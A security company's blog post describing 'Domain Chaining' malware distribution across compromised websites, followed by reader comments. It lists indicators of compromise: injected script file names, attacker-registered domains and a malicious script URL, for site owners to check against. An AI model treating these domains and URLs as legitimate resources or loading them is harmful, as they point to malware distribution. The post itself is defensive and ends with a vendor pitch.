• Domain Chaining Attacks

    Malicious hackers are constantly changing tactics in order to evade detection. One of the relatively new mechanisms that has been used to infect thousands of websites on the Internet is known as Domain Chaining.

    Domain Chaining is the act of using multiple malware infected domains to form a network that distributes exploit code to benign, legitimate, websites that get compromised. This allows malicious hackers to reliably push exploit code to thousands of compromised websites, infecting the websites themselves and in turn the visitors to these sites.

    What is a Domain Chaining attack?
    Domain Chaining attacks have been on the rise since the beginning of this year.

    The basic concept is as follows:

    1. Malicious hackers register multiple websites specifically to spread malware. This malware may exploit browser vulnerabilities to infect visitors’ computers or may redirect unsuspecting users to websites that prompt them to install fake anti-virus software on their computer.
    2. As in traditional attacks, the malicious hackers use a network of compromised, but legitimate, websites in addition to the dedicated malware distribution websites they registered to widely spread their malware across the Internet.

    Why do malicious hackers use this approach?
    There are a few benefits to using this mechanism. The first being that it becomes difficult for signature-based and honeypot-based detection systems to home in on the actual source of the malware versus only identifying the distribution points. Another “benefit” is what can be called “failover.”

    We have blogged about hackers’ understanding of the necessity of failover in the past. In case any security organization identifies a website in this malware chain as being dangerous and manages to shut it down, by using a number of websites to act as distribution points, the distribution of the actual exploit to website visitors does not stop. Think of it like a multi-headed Hydra.

    How do I know if my site is infected?
    If your website is part of this Domain Chaining attack, it will most likely have one of these files.

    script.php
    cssminibar.js, 
    sidename.js,
    jtoolsmini.js,
    tempjs.js,
    js.php,
    jstools.js
    

    What do these files do?
    These scripts load code from infected websites harboring malicious Iframes. The malicious Iframes in turn load exploit code via maliciously registered sites.

    Maliciously registered sites related to this attack:

    brkfnrmnk.co.cc
    brlgnknc.co.cc
    

    Maliciously registered sites related to previous Domain Chaining attacks:

    klubnika34his.com,
    bogdantevye.ru,
    jwjmusic.cx.cc,
    frankieeus.ru,
    gaufridboris.ru,
    stephanos.ru
    

    The malicious website content is primarily distributed by a file named “wpqonfig.php” that redirects Iframes and scripts to a maliciously registered website.

    What script is used in the current attacks?
    The latest version of this Domain Chaining attack uses the following script:

    nbnjkl.com/urchin.js
    

    How do I protect my site?
    Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

    StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

    Till next time…

    • Thank you for the article.
      I learn a lot from your website regarding security of my websites. :)
      Keep up the good work!

      Posted by Joyabo on October 19th

    • What do you think are the techniques attackers are using to get “thousands of compromised websites” to distribute their malware? Mass SQL injection? RFI, LFI? XSS?

      Posted by Lukas on October 29th

    • Primarily SQL Injection and stolen FTP passwords

      Posted by anirban on November 2nd